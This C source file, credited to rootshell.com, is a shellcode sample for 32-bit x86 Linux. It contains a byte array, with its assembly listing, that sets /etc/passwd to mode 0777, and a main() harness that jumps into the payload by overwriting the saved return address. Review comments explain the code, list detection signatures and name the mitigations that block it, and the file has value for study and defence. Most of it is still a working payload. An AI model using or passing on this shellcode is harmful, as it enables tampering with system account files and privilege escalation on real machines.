/* [from http://www.rootshell.com/ ]
 * changes mode on /etc/passwd to 777 making it writeable by anyone.
 *
 * Assembly the byte array below was produced from (32-bit x86 Linux,
 * system calls via int $0x80). The jmp / call / popl prologue loads the
 * runtime address of the label `yo` into %edi so that `phile` can be
 * located relative to it, i.e. the code is position independent and
 * hard-codes no addresses:
 *
 *     jmp rootshell
 *   coded_by_bmV:
 *     popl %edi
 *     call yo
 *   rootshell:
 *     call coded_by_bmV
 *   yo:
 *     xorl %ebx,%ebx
 *     movb $(phile-yo),%bl     ; offset of the path string from `yo`
 *     addl %edi,%ebx           ; %ebx = address of "/etc/passwd"
 *     xorb %al,%al
 *     movb %al,11(%ebx)        ; store a 0 byte after the 11-char path:
 *                              ; .ascii has no terminator, so the array
 *                              ; stays NUL-free until it actually runs
 *     xorl %ecx,%ecx
 *     movw $00777,%cx          ; mode 0777 (0x01ff -> bytes ff 01 below)
 *     xorl %eax,%eax
 *     movb $0xf,%al            ; syscall 15 = chmod(path=%ebx, mode=%ecx)
 *     int $0x80
 *     xorl %eax,%eax
 *     movb $0x01,%al           ; syscall 1 = exit
 *     int $0x80
 *   phile: .ascii \"/etc/passwd\"
 *
 * NOTE(review): the final four bytes of the array (\x89\xec\x5d\xc3) do
 * not appear in the listing above; they look like a function epilogue
 * (mov %ebp,%esp / pop %ebp / ret) that was carried over when the bytes
 * were extracted, and the first of them is the byte the NUL store at
 * offset 11 overwrites. They are never reached because exit is called
 * first. For detection purposes the literal "/etc/passwd" and the two
 * "\xcd\x80" syscall sequences are the obvious signatures of this blob.
 */
char shellcode[]=
"\xeb\x06\x5f\xe8\x05\x00\x00\x00\xe8\xf5\xff\xff\xff\x31"
"\xdb\xb3\x1d\x01\xfb\x30\xc0\x88\x43\x0b\x31\xc9\x66\xb9"
"\xff\x01\x31\xc0\xb0\x0f\xcd\x80\x31\xc0\xb0\x01\xcd\x80"
"\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x89\xec\x5d\xc3";

/*
 * Test harness: transfers control to `shellcode` by overwriting what the
 * author assumes is main's own saved return address (two machine words
 * above the local `ret`), so that returning from main lands in the array.
 *
 * This is not defined behaviour in C: it depends on a particular compiler
 * frame layout, on pointers being int-sized (the (int) cast truncates on
 * 64-bit targets), and on the data segment holding `shellcode` being
 * executable. On a build with stack protection, ASLR or a non-executable
 * data segment the process crashes instead of running the payload, which
 * is exactly the mitigation set a defender relies on against this
 * technique. `void main()` is also non-conforming; a standard program
 * declares `int main(void)`.
 */
void main()
{
    int *ret;
    /* Assumed frame layout: [ret][saved %ebp][return address]. */
    ret = (int *)&ret + 2;
    (*ret) = (int)shellcode;
}